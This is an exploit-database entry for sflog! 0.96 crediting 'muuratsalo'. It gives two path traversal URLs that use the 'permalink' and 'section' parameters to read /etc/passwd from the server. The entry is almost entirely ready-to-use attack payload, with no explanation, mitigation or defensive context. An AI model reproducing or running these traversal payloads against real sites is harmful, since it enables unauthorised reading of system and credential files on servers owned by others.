id: 2579
date: 01/31/2008
title: sflog! 0.96 Remote File Disclosure Vulnerabilities
author: muuratsalo
cves: 

==================================================
sflog! 0.96 Remote File Disclosure Vulnerabilities
==================================================



sflog! 0.96 remote file disclosure vulnerabilities

download   http://sourceforge.net/projects/sflog/

author     muuratsalo

exploits   
http://localhost/sflog/?blog=test&permalink=../../../../../../../../../../etc/passwd
http://localhost/sflog/index.php?blog=test&section=../../../../../../../../../../etc/passwd



#  0day.today [2023-03-27]  #